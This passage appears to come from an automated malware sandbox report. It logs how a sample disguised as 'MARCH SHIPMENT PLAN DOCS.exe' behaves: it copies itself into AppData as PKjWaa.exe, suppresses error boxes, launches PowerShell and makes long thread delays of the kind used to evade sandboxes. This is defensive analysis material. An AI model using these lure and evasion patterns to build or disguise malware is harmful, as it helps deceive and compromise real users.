Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 600000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599781 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599672 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599563 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599453 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599344 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599219 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599109 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598781 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598672 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598562 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598453 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598344 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598219 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598109 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597781 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597672 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597562 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597451 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597344 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597234 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597125 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597016 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596766 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596656 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596543 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596436 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596328 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596219 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596109 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595766 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595641 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595531 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595422 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595312 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595203 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595094 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594984 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594875 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594766 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594641 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594516 | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 922337203685477 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 600000 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599891 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599779 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599666 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599547 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599435 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599328 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599219 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599109 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599000 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598891 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598781 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598671 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598562 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598453 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598342 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598234 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598125 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598015 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597905 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597797 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597687 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597578 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597469 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597359 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597250 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597141 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597030 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596922 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596812 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596703 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596594 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596469 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596359 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596250 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596140 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596031 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595922 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595804 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595687 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595578 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595469 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595344 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595234 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595125 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595015 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594906 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594797 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594687 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594578 | |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 5368 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592 | Thread sleep count: 5904 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336 | Thread sleep time: -5534023222112862s >= -30000s | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340 | Thread sleep count: 147 > 30 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332 | Thread sleep time: -7378697629483816s >= -30000s | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -26747778906878833s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -600000s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8100 | Thread sleep count: 1493 > 30 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599891s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8100 | Thread sleep count: 8361 > 30 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599781s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599672s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599563s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599453s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599344s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599219s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599109s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -599000s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598891s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598781s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598672s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598562s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598453s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598344s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598219s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598109s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -598000s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597891s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597781s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597672s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597562s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597451s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597344s >= -30000s | Jump to behavior |
